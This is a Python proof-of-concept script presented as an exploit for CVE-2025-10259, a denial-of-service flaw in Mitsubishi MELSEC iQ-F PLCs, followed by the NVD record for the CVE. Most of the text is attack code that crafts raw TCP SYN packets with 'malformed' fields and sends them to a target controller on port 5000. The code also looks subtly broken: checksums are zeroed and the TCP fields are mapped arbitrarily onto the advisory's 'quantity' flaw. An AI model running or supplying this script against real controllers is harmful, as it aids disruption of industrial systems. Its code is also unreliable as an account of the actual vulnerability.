CVE-2025-10259

#!/usr/bin/env python3 """ CVE-2025-10259 PoC - MELSEC iQ-F TCP DoS Note: This is for educational and authorized testing purposes only. """ import socket import struct import sys def create_malformed_tcp_packet(): """Create a malformed TCP packet with invalid quantity field""" # IP header ip_src = socket.inet_aton('192.168.1.100') # Attacker IP ip_dst = socket.inet_aton('192.168.1.200') # Target IP ip_header = struct.pack('!BBHHHBBH4s4s', 0x45, # Version + IHL 0x00, # TOS 40, # Total Length 0x0000, # ID 0x4000, # Flags + Fragment Offset 64, # TTL 6, # Protocol (TCP) 0x0000, # Checksum ip_src, ip_dst ) # TCP header with malformed fields tcp_src_port = 12345 tcp_dst_port = 5000 # MELSEC default port tcp_seq = 0xFFFFFFFF # Invalid sequence number (malformed quantity) tcp_ack = 0x00000000 tcp_offset = 5 << 4 # Data offset tcp_flags = 0x02 # SYN flag tcp_window = 8192 tcp_checksum = 0x0000 tcp_urgent = 0xFFFF # Invalid urgent pointer (malformed quantity) tcp_header = struct.pack('!HHLLBBHHH', tcp_src_port, tcp_dst_port, tcp_seq, tcp_ack, tcp_offset, tcp_flags, tcp_window, tcp_checksum, tcp_urgent ) return ip_header + tcp_header def exploit(target_ip, target_port=5000): """Send malformed packets to trigger DoS""" print(f'[*] Target: {target_ip}:{target_port}') print('[*] Sending malformed TCP packets...') sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) packet = create_malformed_tcp_packet() for i in range(10): try: sock.sendto(packet, (target_ip, target_port)) print(f'[+] Packet {i+1} sent') except Exception as e: print(f'[-] Error: {e}') print('[*] Attack completed') sock.close() if __name__ == '__main__': if len(sys.argv) < 2: print(f'Usage: {sys.argv[0]} <target_ip> [port]') sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 5000 exploit(target, port)

{"cve": {"id": "CVE-2025-10259", "sourceIdentifier": "[email protected]", "published": "2025-11-06T08:15:36.640", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Validation of Specified Quantity in Input vulnerability in TCP Communication Function on Mitsubishi Electric Corporation MELSEC iQ-F Series CPU module allows a remote attacker to disconnect the connection by sending specially crafted TCP packets to cause a denial-of-service (DoS) condition on the products. There is no impact on connections other than the attacked one."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1284"}]}], "references": [{"url": "https://jvn.jp/vu/JVNVU92088475/", "source": "[email protected]"}, {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-317-01", "source": "[email protected]"}, {"url": "https://www.mitsubishielectric.com/psirt/vulnerability/pdf/2025-014_en.pdf", "source": "[email protected]"}]}}